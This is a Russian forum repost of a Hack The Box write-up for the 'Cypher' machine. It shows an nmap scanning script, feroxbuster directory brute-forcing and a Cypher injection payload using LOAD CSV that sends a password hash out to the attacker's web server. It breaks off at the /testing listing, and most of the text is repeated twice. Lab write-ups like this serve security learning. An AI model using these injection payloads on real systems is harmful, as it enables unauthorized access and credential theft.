Оффлайн
- Регистрация
- 9 Май 2015
- Сообщения
- 1,483
- Баллы
- 155
Сегодня я покажу, как при помощи инъекции кода на языке Cypher можно атаковать графовую базу данных Neo4j и обойти авторизацию. Затем мы проведем инъекцию команд ОС и получим сессию на хосте, а собрав учетные данные, сменим пользовательскую сессию и повысим привилегии через регистрацию своего модуля для BBOT.
Наша цель — получение прав суперпользователя на машине Cypher с учебной площадки . Уровень сложности задания — средний.
warning
Подключаться к машинам с HTB рекомендуется с применением средств анонимизации и виртуализации. Не делай этого с компьютеров, где есть важные для тебя данные, так как ты окажешься в общей сети с другими участниками.
Разведка
Сканирование портов
Добавляем IP-адрес машины в /etc/hosts:
10.10.11.57 cypher.htb
И запускаем сканирование портов.
Справка: сканирование портов
Сканирование портов — стандартный первый шаг при любой атаке. Он позволяет атакующему узнать, какие службы на хосте принимают соединение. На основе этой информации выбирается следующий шаг к получению точки входа.
Наиболее известный инструмент для сканирования — это Nmap. Улучшить результаты его работы ты можешь при помощи следующего скрипта:
#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '
' ',' | sed s/,$//)
nmap -p$ports -A $1
Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция -A).
Результат работы скрипта
Сканер нашел два открытых порта:
По отчету Nmap видно, что веб‑сервер выполняет редирект на сайт . Там нас встретит сайт с графом и ссылкой на страницу авторизации.
Главная страница сайта
Точка входа
Я попробовал вставить в форму авторизации базовую нагрузку, которая бы помогла обойти авторизацию, если бы сработала инъекция admin' or 1=1 -- -. Однако получаем огромный текст ошибки.
Форма авторизации
Удобнее просмотреть текст в Burp History. Нам отображается часть запроса на языке Cypher, который используется на сервере.
Burp History
Про Cypher-инъекции я уже писал в . По запросу видно, что хеш пароля возвращается как значение h.value. Выполним инъекцию и эксфильтруем на свой веб‑сервер значение хеша. Сам сервер создаем командой python3 -m http.server.
admin' OR 1=1 LOAD CSV FROM ' AS hash Return ''//
Запрос на сервер
Логи веб‑сервера
Попытки пробрутить хеш ни к чему не привели, поэтому попытаемся найти еще что‑нибудь интересное.
Точка опоры
Попробуем перебрать каталоги и файлы при помощи feroxbuster.
Справка: сканирование веба c feroxbuster
Одно из первых действий при тестировании безопасности веб‑приложения — это сканирование методом перебора каталогов, чтобы найти скрытую информацию и недоступные обычным посетителям функции. Для этого можно использовать программы вроде , или . Я предпочитаю .
При запуске указываем следующие параметры:
Задаем все параметры и запускаем перебор:
feroxbuster -u -w directory_2.3_medium_lowercase.txt -d 1 -t 128
Результат сканирования каталогов с помощью feroxbuster
Среди эндпоинтов есть интересные: /api и /testing. На первом всегда Not Found, а вот каталог /testing не имеет индекс‑файла, и поэтому мы получаем список файлов в каталоге.
Ответ сервера
Содержимое каталога testing
Наша цель — получение прав суперпользователя на машине Cypher с учебной площадки . Уровень сложности задания — средний.
warning
Подключаться к машинам с HTB рекомендуется с применением средств анонимизации и виртуализации. Не делай этого с компьютеров, где есть важные для тебя данные, так как ты окажешься в общей сети с другими участниками.
Разведка
Сканирование портов
Добавляем IP-адрес машины в /etc/hosts:
10.10.11.57 cypher.htb
И запускаем сканирование портов.
Справка: сканирование портов
Сканирование портов — стандартный первый шаг при любой атаке. Он позволяет атакующему узнать, какие службы на хосте принимают соединение. На основе этой информации выбирается следующий шаг к получению точки входа.
Наиболее известный инструмент для сканирования — это Nmap. Улучшить результаты его работы ты можешь при помощи следующего скрипта:
#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '
' ',' | sed s/,$//)
nmap -p$ports -A $1
Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция -A).
Результат работы скрипта
Сканер нашел два открытых порта:
- 22 — служба OpenSSH 9.6p1;
- 80 — веб‑сервер Nginx 1.24.0.
По отчету Nmap видно, что веб‑сервер выполняет редирект на сайт . Там нас встретит сайт с графом и ссылкой на страницу авторизации.
Главная страница сайта
Точка входа
Я попробовал вставить в форму авторизации базовую нагрузку, которая бы помогла обойти авторизацию, если бы сработала инъекция admin' or 1=1 -- -. Однако получаем огромный текст ошибки.
Форма авторизации
Удобнее просмотреть текст в Burp History. Нам отображается часть запроса на языке Cypher, который используется на сервере.
Burp History
Про Cypher-инъекции я уже писал в . По запросу видно, что хеш пароля возвращается как значение h.value. Выполним инъекцию и эксфильтруем на свой веб‑сервер значение хеша. Сам сервер создаем командой python3 -m http.server.
admin' OR 1=1 LOAD CSV FROM ' AS hash Return ''//
Запрос на сервер
Логи веб‑сервера
Попытки пробрутить хеш ни к чему не привели, поэтому попытаемся найти еще что‑нибудь интересное.
Точка опоры
Попробуем перебрать каталоги и файлы при помощи feroxbuster.
Справка: сканирование веба c feroxbuster
Одно из первых действий при тестировании безопасности веб‑приложения — это сканирование методом перебора каталогов, чтобы найти скрытую информацию и недоступные обычным посетителям функции. Для этого можно использовать программы вроде , или . Я предпочитаю .
При запуске указываем следующие параметры:
- -u — URL;
- -w — словарь (я использую словари из набора );
- -d — глубина сканирования;
- -t — количество потоков.
Задаем все параметры и запускаем перебор:
feroxbuster -u -w directory_2.3_medium_lowercase.txt -d 1 -t 128
Результат сканирования каталогов с помощью feroxbuster
Среди эндпоинтов есть интересные: /api и /testing. На первом всегда Not Found, а вот каталог /testing не имеет индекс‑файла, и поэтому мы получаем список файлов в каталоге.
Ответ сервера
Содержимое каталога testing